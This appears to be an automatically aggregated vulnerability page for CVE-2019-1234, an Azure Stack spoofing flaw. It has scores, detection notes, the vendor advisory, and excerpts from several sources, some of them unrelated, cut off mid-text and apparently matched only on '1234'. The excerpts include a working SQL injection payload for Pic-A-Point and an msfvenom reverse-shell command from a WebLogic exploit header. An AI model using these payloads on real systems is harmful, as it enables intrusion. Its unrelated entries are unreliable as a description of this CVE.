CVE-2019-1234
published 2019-11-12
CVE-2019-1234: A spoofing vulnerability exists when Azure Stack fails to validate certain requests, aka 'Azure Stack Spoofing Vulnerability'.
Priority P357 · high · 7.5 · CVSS 3.1
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS 57.94% (99.0th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | azure_stack | — | — |
| msrc | azure_stack | — | — |
Detection & IOCs
- Attacker sends a specially crafted request to the Azure Stack user portal to exploit the spoofing vulnerability
- Monitor for unauthenticated HTTP requests to the VirtualMachineScreenshot API route on the DataService of AzS-XRP01, which can be used to capture screenshots of tenant and infrastructure VMs
- Exploit status: publicly disclosed: No; exploited: No; rated Exploitation Less Likely for both latest and older software releases at time of advisory
CVSS provenance
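| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:P/A:N |
| vendor_msrc | — | 7.5 | HIGH | — |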
Microsoft
Azure Stack Spoofing Vulnerability
vendor_msrc·2019-11-12·CVSS 7.5
CVE-2019-1234 [HIGH] Azure Stack Spoofing Vulnerability
Description: A spoofing vulnerability exists when Azure Stack fails to validate certain requests. An attacker who successfully exploited the vulnerability could make requests to internal Azure Stack resources.
An attacker could exploit the vulnerability by sending a specially crafted request to the Azure Stack user portal.
The update addresses the vulnerability by changing how Azure Stack handles certain requests.
Azure Stack: Azure Stack
Impact: Spoofing
Exploit Status: Publicly Disclosed: No; Exploited: No; Latest Software Release: Exploitation Less Likely; Older Software Release: Exploitation Less Likely
Remediation: Release Notes
Reference: https://docs.microsoft.com/en-us/azure-stack/operator/release-notes-security-updates?view=azs-1910
GHSA
GHSA-jw56-f5mh-fpcf: A spoofing vulnerability exists when Azure Stack fails to validate certain requests, aka 'Azure Stack Spoofing Vulnerability'
ghsa_unreviewed·2022-05-24
CVE-2019-1234 [MEDIUM] GHSA-jw56-f5mh-fpcf: A spoofing vulnerability exists when Azure Stack fails to validate certain requests, aka 'Azure Stack Spoofing Vulnerability'
No detection rules found.
Exploit-DB
citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
exploitdb·2019-09-26
---
# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-26
# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point
# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip
# Tested Version: 1.1
# Tested on OS: CentOS 7
# CVE: N/A
# Description:
# Simple SQL injection after application authentication.
# POST Request
# Parameter: Consignment (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now
# Type: error-based
#
Exploit-DB
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
exploitdb·2019-04-30·CVSS 9.8
CVE-2019-2725 [CRITICAL] Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
---
#!/usr/bin/python
# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725
# Date: 30/04/2019
# Exploit Author: Avinash Kumar Thapa
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0
# Tested on:
#OS: Windows 2012 R2 (Build 9600).
#Architecture : x64
#System Language : en_US
# CVE : CVE-2019-2725
# Script Usage:
# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1
# Add the powershell command in the variable
__author__ = "Avinash K
Checkpoint
Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructure (Part I)
blogs_checkpoint·2020-01-30
CVE-2019-1234 Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructure (Part I)
## Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructure (Part I)
## Ronen Shustin
## Cloud Attack Part I
## Motivation
Cloud security is like voodoo. Clients
Talos
Microsoft Patch Tuesday — Nov. 2019: Vulnerability disclosures and Snort coverage
blogs_talos·2019-11-12·CVSS 9.1
[CRITICAL] Microsoft Patch Tuesday — Nov. 2019: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 75 vulnerabilities, 13 of which are considered "critical," with the rest being deemed "important."
This month’s security update covers security issues in a variety of Microsoft services and software, including the Scripting Engine, the Windows Hyper-V hypervisor, and Win32. Cisco Talos discovered one of these vulnerabilities, CVE-2019-1448, a remote code execution vulnerability in Microsoft Excel. For more on this bug, read our full Vulnerability Spotlight here. We are also disclosing a remote code execution vulnerability in Microsoft Media Foundation.
Talos also released a new set of SNORTⓇ rules that provide covera
Bugzilla
CVE-2019-7837 flash-plugin: Arbitrary Code Execution vulnerability (APSB19-26)
bugzilla·2019-05-14·CVSS 8.8
CVE-2019-7837 [HIGH] CVE-2019-7837 flash-plugin: Arbitrary Code Execution vulnerability (APSB19-26)
Adobe Security Bulletin APSB19-26 for Adobe Flash Player describes a flaw that can possibly lead to arbitrary code execution when Flash Player is used to play a specially crafted SWF file:
Use After Free -- CVE-2019-7837
External References:
https://helpx.adobe.com/security/products/flash-player/apsb19-26.html
Discussion:
This issue has been addressed in the following products:
Red Hat Enterprise Linux 6 Supplementary
Via RHSA-2019:1234 https://access.redhat.com/errata/RHSA-2019:1234
Bugzilla
CVE-2019-10136 spacewalk: Insecure computation of authentication signatures during user authentication
bugzilla·2019-05-10·CVSS 4.3
CVE-2019-10136 [MEDIUM] CVE-2019-10136 spacewalk: Insecure computation of authentication signatures during user authentication
During user authentication, the hash input does not contain any length fields or field boundaries, so that the same hashes are computed e.g. for {server-time=1234, expire-offset=567} (end date 1801) and {server-time=1, expire-offset=234567} (end date 234568).
An attacker could use this flaw to reuse an expired token, and extend its expiry date.
Discussion:
Acknowledgments:
Name: Malte Kraus (SUSE)
---
in server/apacheAuth.py:
def auth_client():
    # [...]
    clientId = token['x-rhn-server-id']
    username = token['x-rhn-auth-user-id']
    signature = token['x-rhn-auth']
    rhnServerTime = token['x-rhn-auth-server-time']
    expireOffset = token['x-rhn-auth-expire-offset']
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1234
https://research.checkpoint.com/2020/remote-cloud-execution-critical-vulnerabilities-in-azure-cloud-infrastructure-part-i/
Published: 2019-11-12